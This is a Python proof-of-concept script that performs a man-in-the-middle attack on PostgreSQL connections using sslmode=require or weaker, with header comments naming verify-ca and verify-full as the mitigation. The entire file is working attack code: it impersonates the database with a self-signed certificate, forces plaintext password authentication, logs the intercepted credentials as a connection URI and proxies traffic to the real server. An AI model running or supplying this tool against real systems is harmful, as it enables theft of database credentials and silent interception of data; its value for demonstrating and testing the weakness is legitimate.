#!/usr/bin/env python from __future__ import print_function # This script demonstrates how to setup a Man-in-the-Middle (MitM) attack on a # Postgres connection with SSLMODE=require or less. Attack is mitigated by # setting SSLMODE=verify-ca or SSLMODE=verify-full, which requires you to get # the certificate of either your server or a CA that has signed it's # certificate. # What the script does: # * Bind to 5432 and listen for incoming connections # * If someone connects over plaintext, request password to be sent in the clear # * If someone requests to connect over SSL, initiate the SSL connection with a # self-signed certificate, then ask for password in plaintext # * Initiate TLS connection to actual database with the supplied credentials # * Proxy all traffic between the client and the actual database # The target database must be given as an argument on the command line. # PS: Please don't look to this script for examples of how to write good socket # code, this is just a proof of concept. import argparse import hashlib import logging import os import select import socket import ssl import struct import sys import tempfile import textwrap import threading import time from collections import namedtuple # Sent by client when requesting TLS connection (this is the magic version # 1234.5679 of the protocol, defined in pgcomm.h) VERSION_SSL = b'\x04\xd2\x16\x2f' VERSION_3 = b'\x00\x03\x00\x00' SSL_STARTUP_RESPONSE = b'S' PY2 = sys.version_info < (3, 0, 0) _logger = logging.getLogger(__name__) # Lifted from pqcomm.h AUTH_METHODS = { 'AUTH_REQ_OK': 0, # User is authenticated 'AUTH_REQ_KRB4': 1, # Kerberos V4. Not supported any more. 'AUTH_REQ_KRB5': 2, # Kerberos V5. Not supported any more. 'AUTH_REQ_PASSWORD': 3, # Password 'AUTH_REQ_CRYPT': 4, # crypt password. Not supported any more. 'AUTH_REQ_MD5': 5, # md5 password 'AUTH_REQ_SCM_CREDS': 6, # transfer SCM credentials 'AUTH_REQ_GSS': 7, # GSSAPI without wrap() 'AUTH_REQ_GSS_CONT': 8, # Continue GSS exchanges 'AUTH_REQ_SSPI': 9, # SSPI negotiate without wrap() } AUTH_METHODS_REVERSE = {val: key for key, val in AUTH_METHODS.items()} def main(): args = get_args() configure_logger(args.logging_level) target_backend = args.backend sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) sock.bind(('', args.port)) # max queued connections backlog = 5 sock.listen(backlog) _logger.info('Listening for connections') # Maintain a reference to running threads to enable stopping them when the # script terminates threads = set() last_check_for_stopped_threads = time.time() try: while True: client_socket, address = sock.accept() client_handler = ClientConnection(client_socket, target_backend) client_handler.start() threads.add(client_handler) if time.time() - last_check_for_stopped_threads > 3: remove_stopped_threads(threads) except (KeyboardInterrupt, SystemExit): _logger.info('Received exit, shutting down') sock.shutdown(socket.SHUT_RDWR) sock.close() stop_threads(threads) def get_args(): parser = argparse.ArgumentParser('postgres-mitm') parser.add_argument('backend') parser.add_argument('-l', '--logging-level', choices=('debug', 'info', 'warning'), default='info') parser.add_argument('-p', '--port', default=5432, type=int, help='The local port to bind to. Default: %(default)s') return parser.parse_args() def configure_logger(level): logging.basicConfig(format='%(asctime)-15s [%(levelname)s] %(message)s') _logger.setLevel(getattr(logging, level.upper())) def remove_stopped_threads(threads): threads_to_remove = [] for thread in threads: if thread.stopped: threads_to_remove.append(thread) for thread in threads_to_remove: threads.remove(thread) def stop_threads(threads): for thread in threads: thread.stop() class ClientConnection(threading.Thread): def __init__(self, client_socket, target_backend): super(ClientConnection, self).__init__() for proto in ('PROTOCOL_TLSv1_2', 'PROTOCOL_TLSv1', 'PROTOCOL_SSLv23'): protocol = getattr(ssl, proto, None) if protocol: break self.ssl_context = ssl.SSLContext(protocol) dirname = os.path.dirname(__file__) cert = os.path.join(dirname, 'cert.pem') key = os.path.join(dirname, 'key.pem') self.ssl_context.load_cert_chain(cert, key) self.socket = client_socket self.target_backend = target_backend self.server_socket = None self._stop = threading.Event() def stop(self): self._stop.set() @property def stopped(self): return self._stop.isSet() def run(self): buffer_size = 4096 try: self.initiate_client_and_server_connections() _logger.debug('Initiated') while not self.stopped: timeout = 0 sockets = [self.server_socket, self.socket] sockets_with_data = select.select(sockets, [], [], timeout)[0] if self.socket in sockets_with_data: data = self.socket.recv(buffer_size) _logger.debug('Client -> Server: %s' % repr(data)) if data: self.server_socket.send(data) else: self.socket.close() self.server_socket.shutdown(socket.SHUT_RDWR) self.server_socket.close() break if self.server_socket in sockets_with_data: data = self.server_socket.recv(buffer_size) _logger.debug('Server -> Client: %s' % repr(data)) if data: self.socket.send(data) else: self.socket.shutdown(socket.SHUT_RDWR) self.socket.close() self.server_socket.shutdown(socket.SHUT_RDWR) self.server_socket.close() except ssl.SSLError as exc: if exc.reason == 'TLSV1_ALERT_UNKNOWN_CA': _logger.info('Client had an established trust root, could' ' not intercept details.') else: _logger.info('Got TLS error when establishing connection: %s', exc.strerror) raise except Exception as exc: _logger.exception('Got exception during protocol handling: %s' % exc) finally: self.terminate() def initiate_client_and_server_connections(self): # wait for startup packet first_client_packet = self.wait_for_client_ssl_or_startup_packet() requested_protocol_version = first_client_packet[4:8] if requested_protocol_version == VERSION_SSL: _logger.debug('Got SSL startup request') self.send_to_client(SSL_STARTUP_RESPONSE) self.listen_for_tls_handshake() startup_packet = self.wait_for_client_ssl_or_startup_packet() self.handle_startup_packet(startup_packet) elif requested_protocol_version == VERSION_3: # Didn't request SSL, totally fine for us, just request plaintext # auth and grab the credentials _logger.debug('Initiating plaintext connection') self.handle_startup_packet(first_client_packet) else: # Invalid first packet, abort the connection self.terminate() return auth_request = self.wait_for_auth_request() if not self.handle_authentication_request(auth_request): raise Exception('Backend auth failed') def wait_for_client_ssl_or_startup_packet(self): # Either SSL request or startup is the first packet sent, both has the # format [] # Read first 8 bytes to get tag and length of packet first_8_bytes = self.read_n_bytes_from_client(8) # Startup messages and SSL requests start with length of message in # the first four bytes msg_length = struct.unpack('!I', first_8_bytes[:4])[0] rest_of_message = self.read_n_bytes_from_client(msg_length - 8) return first_8_bytes + rest_of_message def wait_for_auth_request(self): # Format of message is first_5_bytes = self.read_n_bytes_from_client(5) tag = first_5_bytes[0:1] if tag != b'p': raise Exception("Received non-auth request: %s" % tag) # Bump length with 1 to offset for tag msg_length = struct.unpack('!I', first_5_bytes[1:])[0] + 1 _logger.debug('Reading auth request, waiting for %d bytes' % msg_length) rest_of_message = self.read_n_bytes_from_client(msg_length - 5) return first_5_bytes + rest_of_message def read_n_bytes_from_client(self, n): return read_n_bytes_from_socket(self.socket, n) def read_n_bytes_from_server(self, n): return read_n_bytes_from_socket(self.server_socket, n) def send_to_client(self, msg): bytes_sent = 0 while bytes_sent < len(msg): sent = self.socket.send(msg[bytes_sent:]) if sent == 0: raise Exception('Client socket closed') bytes_sent += sent def handle_startup_packet(self, data): self.startup_packet = data self.options = parse_options_from_startup_packet(data) _logger.debug('Startup packet processed successfully: %s' % self.options) length = struct.pack('!I', 8) method = struct.pack('!I', AUTH_METHODS['AUTH_REQ_PASSWORD']) auth_reply = b'R' + length + method _logger.debug('Replying to startup: %s' % repr(auth_reply)) self.socket.send(auth_reply) return True def handle_authentication_request(self, data): _logger.debug('Got auth response packet: %s' % repr(data)) password = parse_password_from_authentication_packet(data) if self.connect_to_actual_backend(password): captured_uri = 'postgres://%(user)s:%(password)s@%(host)s:5432/%(database)s' % { 'user': self.options.get('user', b'').decode('utf-8'), 'password': password.decode('utf-8'), 'host': self.target_backend, 'database': self.options.get('database', b'').decode('utf-8'), } _logger.info('Intercepted auth: %s' % captured_uri) # Switch socket to non-blocking to enable messages to pass in # arbitrary order self.socket.setblocking(0) else: return False return True def connect_to_actual_backend(self, password): self.server_socket = socket.create_connection((self.target_backend, 5432)) length = struct.pack('!I', 8) packet = length + VERSION_SSL self.server_socket.sendall(packet) data = read_n_bytes_from_socket(self.server_socket, 1) assert data == b'S' self.server_socket = self.ssl_context.wrap_socket(self.server_socket) self.server_socket.do_handshake() self.server_socket.sendall(self.startup_packet) raw_auth_request = self.receive_auth_request_from_backend() _logger.debug('Got auth request: %s' % repr(raw_auth_request)) auth_request = parse_auth_request_packet(raw_auth_request) if auth_request.method == 'AUTH_REQ_MD5': # options is 4-byte salt salt = auth_request.options response = create_md5_auth_packet(self.options.get('user', b''), password, salt) self.server_socket.sendall(response) else: _logger.debug('Unsupported backend auth method: %s' % auth_request.method) return False # Make socket non-blocking self.server_socket.setblocking(0) return True def receive_auth_request_from_backend(self): first_9_bytes = self.read_n_bytes_from_server(9) assert first_9_bytes[0:1] == b'R' packet_length = struct.unpack('!I', first_9_bytes[1:5])[0] # Tag doesn't count on length, read the rest the_rest = self.read_n_bytes_from_server(packet_length - 8) return first_9_bytes + the_rest def listen_for_tls_handshake(self): self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True) def terminate(self): _logger.debug('Terminating thread') for sock in (self.socket, self.server_socket): if not sock: continue try: sock.close() except: _logger.exception('Got exception when trying to close socket') self.stop() def socket_is_closed(sock): return isinstance(sock._sock, socket._closedsocket) def read_n_bytes_from_socket(sock, n): buf = bytearray(n) view = memoryview(buf) while n: nbytes = sock.recv_into(view, n) view = view[nbytes:] # slicing views is cheap n -= nbytes return buf def create_md5_auth_packet(username, password, salt): pw_and_username = password + username pw_hash = hashlib.md5(pw_and_username).hexdigest() salted_hash = 'md5' + hashlib.md5(pw_hash.encode('utf-8') + salt).hexdigest() # 32 bytes of digest, four bytes length, 3 bytes for 'md5', one byte terminating null length = struct.pack('!I', 40) return b'p' + length + salted_hash.encode('utf-8') + b'\x00' def parse_options_from_startup_packet(data): # format is [\0\0]+\0 raw_key_value_pairs = data[8:] assert raw_key_value_pairs[-1] == 0 raw_key_value_pairs = raw_key_value_pairs[0:-1] if PY2: assert raw_key_value_pairs.count('\0') % 2 == 0 else: assert raw_key_value_pairs.count(0) % 2 == 0 options = {} key_value_pairs = data[8:].split(b'\x00') for i in range(0, len(key_value_pairs), 2): key = key_value_pairs[i] value = key_value_pairs[i + 1] options[key.decode('utf-8')] = value return options def parse_password_from_authentication_packet(data): assert data[-1] == 0 return data[5:-1] def parse_auth_request_packet(data): # format is R[] method = struct.unpack('!I', data[5:9])[0] assert method in AUTH_METHODS_REVERSE textual_method = AUTH_METHODS_REVERSE[method] AuthRequest = namedtuple('AuthRequest', 'method options') return AuthRequest(textual_method, data[9:]) if __name__ == '__main__': main()